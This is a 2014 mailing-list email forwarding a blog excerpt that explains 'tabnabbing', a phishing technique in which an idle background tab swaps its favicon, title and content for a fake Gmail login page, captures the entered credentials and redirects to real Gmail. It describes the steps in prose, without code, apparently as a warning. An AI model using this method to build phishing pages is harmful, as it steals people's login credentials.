Date: Thu, 11 Sep 2014 18:15:39 -0400
From: mark <whitroth@5-cent.us>
To: undisclosed-recipients:;
Subject: [WSFA] gmail: Tabnabbing: A New Type of Phishing Attack
Reply-To: WSFA members <WSFAlist@KeithLynch.net>

ExcerptHow The Attack Works

     A user navigates to your normal looking site.
     You detect when the page has lost its focus and hasn\342\200\231t been interacted
with for a while.
     Replace the favicon with the Gmail favicon, the title with \342\200�Gmail:
Email from Google\342\200�, and the page with a Gmail login look-a-like. This
can all be done with just a little bit of Javascript that takes place
instantly.
     As the user scans their many open tabs, the favicon and title act as a
strong visual cue\342\200\224memory is malleable and moldable and the user will
most likely simply think they left a Gmail tab open. When they click
back to the fake Gmail tab, they\342\200\231ll see the standard Gmail login page,
assume they\342\200\231ve been logged out, and provide their credentials to log
in. The attack preys on the perceived immutability of tabs.
     After the user has entered their login information and you\342\200\231ve sent it
back to your server, you redirect them to Gmail. Because they were
never logged out in the first place, it will appear as if the login
was successful.

I dub this new type of phishing attack \342\200�tabnabbing\342\200�.
--- end excerpt ---

<:http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/>

        mark